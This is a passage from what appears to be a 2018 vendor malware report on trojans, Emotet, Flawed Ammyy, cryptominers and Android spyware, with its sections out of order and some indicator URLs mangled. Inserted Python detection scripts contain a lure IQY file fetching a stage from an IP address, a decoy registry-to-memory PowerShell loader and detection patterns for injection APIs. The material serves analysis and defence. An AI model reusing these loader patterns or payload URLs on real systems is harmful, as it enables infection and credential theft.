Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


2 Trojans going on the offensive to hunt for confidential data

The second quarter of 2018 brought a sudden change in the malware competition: trojans squeezed out other malware types and jumped to the top of the charts. Having gained the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their rise forces cybersecurity departments and individual users to update their defense tactics.

Malware Distribution by Type

Why are these changes inevitable?

Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at enabling a diversity of attacks, from stealing data to implanting ransomware, adware or cryptominers, or even completely crashing systems.

Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.

Hence the need for a new approach to defense tactics. Let's have a closer look at the most active, vicious players of the trojan team to understand in depth what harm they can do to your computers if they sneak inside.


Distribution of top 30 Malware Families

In this list of the top 30 malware families, where trojans overwhelmingly dominate, you can find samples exhibiting diverse types of malicious activity.

For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. The downloaded malware can be of any type.

Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website that infects users with other types of malware.

TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".

TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.


TrojWare.Win32.Injector uses process injection as its main technique for taking malicious actions. It is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via phishing email.

Such diversity of malicious activity, together with their special ability to hide, has always made trojans one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among the trends is the explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data, and then send it to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of the 20 are trojans.

Distribution of Phishing Families of Malware


2.1 The Most Widespread Trojan

The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to the AppData folder as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather the credentials present on the system.

It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server httpcallbedmlpackfarefrephp

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend is related to the malware itself rather than to its delivery method. Cybercriminals often use malware that is based not on native Windows .exe files but instead on PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire the user's trust.

The phishing email


The attached file is an Office document containing a VBScript. As a freshly installed Microsoft Office does not allow execution of such scripts by default, the attackers added a special option to convince the victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell


The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers using popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is that this trick is also based on using legitimate software, this time from Microsoft.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly inside MS Excel.

The malicious IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
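As an added illustration of the IQY mechanism described above (not code from the report), the following Python script parses an IQY attachment offline, extracts the query URL and flags the properties a mail gateway would hold for review; the allowlisted host, the sample files and the suffix policy are assumptions.

```python
"""Offline triage of an Excel .iqy (Internet Query) attachment.

Added example for this section, not code from the report.  An IQY file is
plain text: the literal header "WEB", a version line, the URL Excel will
fetch, then optional Key=Value settings.  The file is inert; the risk is
the URL, which Excel requests (and may act on) once the query is enabled.
This parser pulls the URL out and flags anything a mail gateway should
hold for review.  The allowlist and the sample files are constructed.
"""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Hosts that legitimately serve spreadsheet queries in our hypothetical org.
ALLOWED_HOSTS = {"reports.corp.example"}

# A query URL ending like this is a loader, not data (assumed local policy).
SCRIPT_SUFFIXES = (".exe", ".dll", ".ps1", ".vbs", ".js", ".hta",
                   ".bat", ".cmd", ".scr")


@dataclass
class IqyVerdict:
    url: Optional[str] = None
    host: Optional[str] = None
    params: Dict[str, str] = field(default_factory=dict)
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_iqy(text: str) -> IqyVerdict:
    """Split an IQY body into header check, URL and Key=Value settings."""
    verdict = IqyVerdict()
    lines = [ln.strip() for ln in text.splitlines()]
    if not lines or lines[0].upper() != "WEB":
        verdict.findings.append("first line is not the WEB header")
    else:
        lines = lines[1:]
    # The version line (normally "1") may be absent in practice; skip it.
    if lines and lines[0].isdigit():
        lines = lines[1:]
    rest: List[str] = []
    for i, ln in enumerate(lines):
        if ln:                      # first non-empty line is the query URL
            verdict.url = ln
            rest = lines[i + 1:]
            break
    for ln in rest:
        if "=" in ln:
            key, _, value = ln.partition("=")
            verdict.params[key.strip()] = value.strip()
    return verdict


def triage_iqy(text: str) -> IqyVerdict:
    """Parse and apply the gateway checks; each finding explains one flag."""
    v = parse_iqy(text)
    if v.url is None:
        v.findings.append("no query URL present")
        return v
    parts = urlsplit(v.url)
    v.host = (parts.hostname or "").lower() or None
    if parts.scheme not in ("http", "https"):
        v.findings.append(f"unexpected scheme {parts.scheme!r}")
    elif parts.scheme == "http":
        v.findings.append("plain http: fetched content can be swapped in transit")
    if v.host is None:
        v.findings.append("URL has no host")
    else:
        if v.host not in ALLOWED_HOSTS:
            v.findings.append(f"host {v.host!r} is not on the allowlist")
        try:
            ipaddress.ip_address(v.host)
            v.findings.append("host is a bare IP address")
        except ValueError:
            pass                    # a normal hostname
    if parts.path.lower().endswith(SCRIPT_SUFFIXES):
        v.findings.append("query URL names an executable or script")
    return v


# Constructed samples: one legitimate internal query, one lure-style file.
BENIGN_IQY = """WEB
1
https://reports.corp.example/q2/sales.aspx

Selection=AllTables
Formatting=None
"""

LURE_IQY = """WEB
1
http://203.0.113.7/invoice/stage1.dat
"""
```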

Malware runs PowerShell


Thus in this case machines face extremely dangerous and potent malware, created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect the attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulation of users. It is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use the stolen data to their advantage. In many cases attacks are discovered only when it is too late, after money has been withdrawn from a bank account or confidential data has been published. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in light of the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.

[Chart: The growth of Flawed Ammyy attacks for Q2, by month: Apr 43188, May 46382, Jun 48881 (y-axis 40000 to 50000)]


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
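An added example, not the report's own code, of the triage a responder would do on a scheduled task like BadShell's: it decodes PowerShell's -EncodedCommand argument (base64 over UTF-16LE) and flags the registry-read plus in-memory-load shape described above. The task command lines and the decoy script are constructed.

```python
"""Decode and triage a PowerShell command line of the kind BadShell leaves in
Task Scheduler.  Added example, not the report's code: it decodes the
-EncodedCommand argument (base64 of UTF-16LE text) and flags the fileless
pattern the text describes, a hidden PowerShell run that reads a blob out of
the registry and executes it in memory.  All command lines below are
constructed decoys, not the real malware's.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Switches that make a scheduled PowerShell run quiet and unattended.
QUIET_SWITCHES = {
    "-windowstyle", "-w", "-noprofile", "-nop", "-noninteractive", "-noni",
    "-executionpolicy", "-ep", "-ex",
}

# Content indicators; each group counts once however many patterns match.
INDICATORS = {
    "registry read": re.compile(
        r"Get-ItemProperty|GetValue\(|\bHK(?:CU|LM)\b|HKEY_", re.I),
    "runtime decoding": re.compile(r"FromBase64String|\[char\]\s*\d+", re.I),
    "in-memory execution": re.compile(
        r"\[Reflection\.Assembly\]::Load|Invoke-Expression|\biex\b|"
        r"VirtualAlloc|CreateRemoteThread|WriteProcessMemory", re.I),
}


@dataclass
class PsVerdict:
    decoded: Optional[str] = None
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        """Encoded command + registry read + in-memory execution: BadShell's shape."""
        required = {"encoded command", "registry read", "in-memory execution"}
        return required <= set(self.findings)


def decode_encoded_command(token: str) -> Optional[str]:
    """-EncodedCommand carries base64 over UTF-16LE; None if not decodable."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def triage_command_line(cmdline: str) -> PsVerdict:
    """Tokenise a task's command line, decode any encoded script, tag findings."""
    verdict = PsVerdict()
    tokens = cmdline.split()            # adequate for paths without spaces
    for i, tok in enumerate(tokens):
        switch = "-" + tok[1:] if tok.startswith("/") else tok
        low = switch.lower()
        if low in QUIET_SWITCHES:
            verdict.findings.append("quiet switch " + switch)
        # powershell.exe accepts short forms such as -e, -ec, -enc for -EncodedCommand
        if len(low) >= 2 and "-encodedcommand".startswith(low) and i + 1 < len(tokens):
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is not None:
                verdict.decoded = decoded
                verdict.findings.append("encoded command")
    body = verdict.decoded if verdict.decoded is not None else cmdline
    for name, pattern in INDICATORS.items():
        if pattern.search(body):
            verdict.findings.append(name)
    return verdict


# Decoy standing in for the stage BadShell keeps in the registry: it reads a
# value and hands it to an in-memory loader.  No real payload is involved.
DECOY_SCRIPT = ("$b=(Get-ItemProperty 'HKCU:\\Software\\Constructed').Blob;"
                "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))")
ENCODED = base64.b64encode(DECOY_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed scheduled-task action, and a legitimate one for comparison.
TASK_CMD = ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
            "-NoP -W Hidden -ep bypass -enc " + ENCODED)
BENIGN_CMD = "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1"
```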

BadShell at work


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes of a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out among other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner occupies the victim's computer undivided, using its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, making them easier for users to detect. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the presence of CoinHive with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1, to make the iframe as invisible as possible.
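As an added example (not from the report), this Python scanner looks for the camouflage just described: it recovers strings a page decodes at runtime with atob() or unescape(), parses any iframes they emit, and flags 1x1 or CSS-hidden frames whose src is a URL shortener. The sample page and the shortener list are constructed; cnhv.co is the shortener domain the text names.

```python
"""Scanner for the CoinHive camouflage described above: an encoded string
that, once decoded, emits a 1x1 iframe pointing at a URL shortener.
Added example, not the report's code.  The sample page and the shortener
list are constructed; cnhv.co is the shortener domain named in the text.
"""
import base64
import binascii
import re
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import unquote, urlsplit

# Shortener hosts worth flagging as an iframe src (assumed list).
SHORTENER_HOSTS = {"cnhv.co", "bit.ly", "tinyurl.com", "goo.gl"}

# Strings handed to document.write()/eval() after decoding at runtime.
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")


def decode_inline_strings(html: str) -> List[str]:
    """Recover the strings a page decodes at runtime (base64 and %-escapes)."""
    out: List[str] = []
    for m in ATOB_RE.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            continue
        out.append(raw.decode("utf-8", "replace"))
    for m in UNESCAPE_RE.finditer(html):
        out.append(unquote(m.group(1)))
    return out


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in an HTML fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value: str) -> bool:
    """True for width/height values of 0 or 1, with or without a unit."""
    digits = re.sub(r"[^0-9]", "", value)
    return digits != "" and int(digits) <= 1


def find_hidden_shortener_iframes(html: str) -> List[Tuple[str, List[str]]]:
    """Return (src, reasons) for every iframe that matches the trick."""
    hits: List[Tuple[str, List[str]]] = []
    layers = [html] + decode_inline_strings(html)   # page itself, then decoded strings
    for index, layer in enumerate(layers):
        collector = IframeCollector()
        collector.feed(layer)
        for frame in collector.iframes:
            reasons: List[str] = []
            if _is_tiny(frame.get("width", "")) and _is_tiny(frame.get("height", "")):
                reasons.append("1x1 iframe")
            if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden",
                         frame.get("style", ""), re.I):
                reasons.append("CSS-hidden iframe")
            host = (urlsplit(frame.get("src", "")).hostname or "").lower()
            if host in SHORTENER_HOSTS:
                reasons.append("src is a URL shortener: " + host)
            if index > 0:
                reasons.append("emitted from a runtime-decoded string")
            if reasons:
                hits.append((frame.get("src", ""), reasons))
    return hits


# Constructed sample page: one honest video embed plus the obfuscated loader.
HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/constructed-key" '
                 'width="1" height="1"></iframe>')
SAMPLE_PAGE = (
    "<html><body><h1>Song lyrics</h1>"
    '<iframe src="https://player.example/embed/42" width="560" height="315"></iframe>'
    '<script>document.write(atob("'
    + base64.b64encode(HIDDEN_IFRAME.encode("utf-8")).decode("ascii")
    + '"));</script></body></html>'
)
```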

Now let's look at the URL https://cnhv.co

And there we find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but does not find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a weakness they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
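An added defensive example (not the report's code) of catching the swap described above: it records what the user actually copied, re-checks the clipboard before a paste, and validates Bitcoin Base58Check so that random text does not trigger an alert. The clipboard is simulated with plain strings, and the scenario uses the two addresses the report quotes below.

```python
"""Detect the swap a cryptocurrency clipboard hijacker performs: the user
copies one wallet address, and by the time it is pasted the clipboard holds
a different, valid-looking address.  Added example, not the report's code.
It remembers what the user actually copied, re-checks the clipboard before a
paste, and validates Bitcoin Base58Check so random text does not trigger it.
The clipboard is simulated with strings; the two addresses in the scenario
are the ones quoted in the report's own example.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Optional

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy (1...) and P2SH (3...) Bitcoin addresses; bech32 is out of scope here.
BTC_ADDRESS_RE = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")


def b58decode(s: str) -> bytes:
    """Base58 to bytes, keeping each leading '1' as a leading zero byte."""
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def is_valid_btc_address(addr: str) -> bool:
    """Base58Check: 21-byte payload + first 4 bytes of double SHA-256."""
    if not BTC_ADDRESS_RE.match(addr):
        return False
    raw = b58decode(addr)
    if len(raw) != 25:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


@dataclass
class SwapAlert:
    copied: str            # what the user put on the clipboard
    found: str             # what is on the clipboard now
    found_checksum_ok: bool  # True when the substitute is a well-formed address


class ClipboardGuard:
    """Remember the user's own copy and compare against the clipboard at paste time."""

    def __init__(self) -> None:
        self._last_copied: Optional[str] = None

    def on_user_copy(self, text: str) -> None:
        # Hook this to the copy shortcut/handler: this is what the user intended.
        self._last_copied = text.strip()

    def check_before_paste(self, clipboard_now: str) -> Optional[SwapAlert]:
        now = clipboard_now.strip()
        if self._last_copied is None or now == self._last_copied:
            return None
        # Only an address-for-address replacement is the hijacker's signature.
        if not (BTC_ADDRESS_RE.match(self._last_copied) and BTC_ADDRESS_RE.match(now)):
            return None
        return SwapAlert(copied=self._last_copied, found=now,
                         found_checksum_ok=is_valid_btc_address(now))


# Constructed scenario built from the two addresses the report quotes.
COPIED_BY_USER = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SWAPPED_IN = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def simulate_hijack() -> Optional[SwapAlert]:
    guard = ClipboardGuard()
    guard.on_user_copy(COPIED_BY_USER)        # user copies the recipient address
    # ... a hijacker rewrites the clipboard in between ...
    return guard.check_before_paste(SWAPPED_IN)
```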

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they have come back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1 Naver Defender

Version-2 Netease Defender

Version-3 PU

Disguises of KevDroid

